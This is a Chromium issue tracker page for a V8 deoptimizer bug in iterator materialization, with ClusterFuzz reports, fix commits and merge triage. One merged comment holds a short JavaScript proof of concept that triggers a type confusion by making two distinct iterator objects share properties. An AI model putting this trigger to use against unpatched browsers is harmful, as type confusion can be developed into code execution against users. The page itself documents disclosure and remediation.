Stack-overflow in v8::internal::TranslatedState::MaterializeAt |
||||||||||||||||||||
Issue descriptionDetailed report: https://clusterfuzz.com/testcase?key=5335701809004544 Fuzzer: ochang_js_fuzzer Job Type: linux_asan_d8_dbg Platform Id: linux Crash Type: Stack-overflow Crash Address: 0x7fff3ca706c0 Crash State: v8::internal::TranslatedState::MaterializeAt FieldAt v8::internal::TranslatedState::MaterializeCapturedObjectAt Sanitizer: address (ASAN) Regressed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=48562:48563 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5335701809004544 Issue filed automatically. See https://github.com/google/clusterfuzz-tools for more information.
,
Nov 21 2017
The stack trace does not look related to the suspected CL.
,
Nov 29 2017
Issue 789394 has been merged into this issue.
,
Nov 29 2017
titzer: Could you please help us find the right owner, if it's not you? Thanks!
lokihardt says, in 789394:
```
Here'a snippet of TranslatedState::MaterializeCapturedObjectAt.
case JS_SET_KEY_VALUE_ITERATOR_TYPE:
case JS_SET_VALUE_ITERATOR_TYPE: {
Handle<JSSetIterator> object = Handle<JSSetIterator>::cast(
isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
Handle<Object> properties = materializer.FieldAt(value_index);
Handle<Object> elements = materializer.FieldAt(value_index);
Handle<Object> table = materializer.FieldAt(value_index);
Handle<Object> index = materializer.FieldAt(value_index);
object->set_raw_properties_or_hash(*properties);
object->set_elements(FixedArrayBase::cast(*elements));
object->set_table(*table);
object->set_index(*index);
return object;
}
case JS_MAP_KEY_ITERATOR_TYPE:
case JS_MAP_KEY_VALUE_ITERATOR_TYPE:
case JS_MAP_VALUE_ITERATOR_TYPE: {
Handle<JSMapIterator> object = Handle<JSMapIterator>::cast(
isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
Handle<Object> properties = materializer.FieldAt(value_index);
Handle<Object> elements = materializer.FieldAt(value_index);
Handle<Object> table = materializer.FieldAt(value_index);
Handle<Object> index = materializer.FieldAt(value_index);
object->set_raw_properties_or_hash(*properties);
object->set_elements(FixedArrayBase::cast(*elements));
object->set_table(*table);
object->set_index(*index);
return object;
}
For these 5 types, it doesn't cache the created objects like "slot->value_ = object". This can be used to create different objects but sharing the same properties which may lead to type confusion.
PoC:
function opt(b) {
let iterator = new Set().values();
iterator.x = 0;
let arr = [iterator, iterator];
if (b)
return arr.slice();
}
for (let i = 0; i < 100000; i++)
opt(false);
let res = opt(true);
let a = res[0];
let b = res[1];
print(a === b); // false
a.x = 7;
print(b.x); // 7
a.a = 1.1; // transition
b.b = 0x1234;
a.a = 1.1; // type confusion
```
,
Nov 29 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=4927952109436928.
,
Nov 30 2017
Jaro is probably the right person to take a look at this one.
,
Dec 4 2017
The following revision refers to this bug: https://chromium.googlesource.com/v8/v8.git/+/9a6f4422c6c194b6d02bea135ef478eba9b59da5 commit 9a6f4422c6c194b6d02bea135ef478eba9b59da5 Author: Jaroslav Sevcik <jarin@chromium.org> Date: Mon Dec 04 17:57:45 2017 [deoptimizer] Fix materialization of iterators. Bug: chromium:787301 Change-Id: If32310f9f2f3f04daa5bdaa9779302f4a012d397 Reviewed-on: https://chromium-review.googlesource.com/806223 Commit-Queue: Jaroslav Sevcik <jarin@chromium.org> Reviewed-by: Benedikt Meurer <bmeurer@chromium.org> Cr-Commit-Position: refs/heads/master@{#49843} [modify] https://crrev.com/9a6f4422c6c194b6d02bea135ef478eba9b59da5/src/deoptimizer.cc [add] https://crrev.com/9a6f4422c6c194b6d02bea135ef478eba9b59da5/test/mjsunit/compiler-regress-787301.js
,
Dec 5 2017
,
Dec 5 2017
ClusterFuzz has detected this issue as fixed in range 49842:49843. Detailed report: https://clusterfuzz.com/testcase?key=5335701809004544 Fuzzer: ochang_js_fuzzer Job Type: linux_asan_d8_dbg Platform Id: linux Crash Type: Stack-overflow Crash Address: 0x7fff3ca706c0 Crash State: v8::internal::TranslatedState::MaterializeAt FieldAt v8::internal::TranslatedState::MaterializeCapturedObjectAt Sanitizer: address (ASAN) Regressed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=48562:48563 Fixed: https://clusterfuzz.com/revisions?job=linux_asan_d8_dbg&range=49842:49843 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5335701809004544 See https://github.com/google/clusterfuzz-tools for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Dec 5 2017
ClusterFuzz testcase 5335701809004544 is verified as fixed, so closing issue as verified. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
,
Dec 5 2017
,
Dec 14 2017
,
Dec 14 2017
This bug requires manual review: Request affecting a post-stable build Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 14 2017
+awhalley@ for merge review (FYI: At the moment there is no plan for M63 respin for Desktop)
,
Dec 14 2017
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 15 2017
,
Dec 15 2017
The following revision refers to this bug: https://chromium.googlesource.com/v8/v8.git/+/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0 commit a2b91edc56435a8829f7c9ddaf1ecaf558173cc0 Author: Jaroslav Sevcik <jarin@chromium.org> Date: Fri Dec 15 10:00:30 2017 Merged: [deoptimizer] Fix materialization of iterators. Revision: 9a6f4422c6c194b6d02bea135ef478eba9b59da5 BUG= chromium:787301 LOG=N NOTRY=true NOPRESUBMIT=true NOTREECHECKS=true R=bmeurer@chromium.org Change-Id: I58698edad5431b87f15614afec8e133f2bc1f7d4 Reviewed-on: https://chromium-review.googlesource.com/828993 Reviewed-by: Benedikt Meurer <bmeurer@chromium.org> Cr-Commit-Position: refs/branch-heads/6.4@{#14} Cr-Branched-From: 0407506af3d9d7e2718be1d8759296165b218fcf-refs/heads/6.4.388@{#1} Cr-Branched-From: a5fc4e085ee543cb608eb11034bc8f147ba388e1-refs/heads/master@{#49724} [modify] https://crrev.com/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0/src/deoptimizer.cc [add] https://crrev.com/a2b91edc56435a8829f7c9ddaf1ecaf558173cc0/test/mjsunit/compiler-regress-787301.js
,
Jan 2 2018
,
Jan 2 2018
No new 63 push planed anyway.
,
Jan 22 2018
,
Feb 27 2018
,
Mar 2 2018
,
Mar 13 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 27 2018
|
||||||||||||||||||||
►
Sign in to add a comment |
||||||||||||||||||||
Comment 1 by ClusterFuzz
, Nov 21 2017Owner: eholk@chromium.org
Status: Assigned (was: Untriaged)